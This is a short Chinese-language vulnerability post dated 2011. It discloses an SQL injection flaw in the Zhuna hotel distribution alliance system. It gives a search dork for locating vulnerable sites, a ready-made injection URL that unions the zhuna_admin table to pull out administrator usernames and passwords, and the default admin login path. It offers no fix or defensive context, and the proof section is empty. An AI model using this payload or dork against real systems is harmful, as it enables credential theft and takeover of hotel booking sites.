发布日期:2011-09.08
发布作者:歌颂

漏洞类型:SQL注入
漏洞描述:住哪网酒店分销联盟系统SQL注入漏洞,直接爆出管理员帐号密码。

Search:inurl:index.php?m=hotelinfo

注入EXP:
http://yunsec.net/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin

默认后台:index.php?m=admin/login

漏洞证明:

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。